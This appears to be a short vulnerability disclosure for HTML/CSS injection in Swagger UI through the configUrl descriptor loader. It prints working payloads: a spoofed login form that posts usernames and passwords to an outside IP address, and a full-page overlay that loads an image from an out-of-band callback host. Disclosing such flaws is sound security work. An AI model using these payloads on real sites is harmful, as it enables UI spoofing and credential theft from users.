- Software: swagger-ui
- Version: 2 and 3.0
- Business Area: SmartBear — API & Developer Tools
- Vendor: https://swagger.io/tools/swagger-ui/
- Presentation: HTML/CSS injection — via configUrl parameter
- Security vulnerability: HTML/CSS injection in info.description rendered by Swagger UI (UI‑spoofing / credential harvesting)
- Vulnerability Type: HTML/CSS injection (content/UI spoofing) — if JS executes, classify as XSS (CWE‑79)
- Affected Component: Swagger UI — configUrl external descriptor loader / info.description rendering (e.g. https://petstore.swagger.io/?configUrl=...)
https://raw.githubusercontent.com/carlosalbertotuma/swagger-ui/refs/heads/main/xss2.yaml
<form><math><mtext></form><form><div><center><b>Valid credentials:</b><form name="login" action="http://192.168.100.73:4444/login.htm"><table><tr><td>Username:</td><td><input type="text" name="username"></td></tr><tr><td>Password:</td><td><input type="password" name="password"></td></tr><tr><td colspan="2" align="center"><input type="submit" value="Login"></td></tr></table></form></center></div> ...
<form><math><mtext></form><form><div style="position:fixed;inset:0;display:flex;justify-content:center;align-items:center;z-index:9999;background:rgba(255,255,255,0.95);"><img src="https://n4sons7mmcl75ec49tdz2md21t7kvej3.oastify.com" alt="Test Image" style="max-width:90vw;max-height:90vh;border:4px solid #000;border-radius:8px;"/><div style="margin-left:0.5rem;font-family:Arial,sans-serif;font-size:14px;color:#333;">Test image loaded via descriptor info.description.</div></form></div>
...
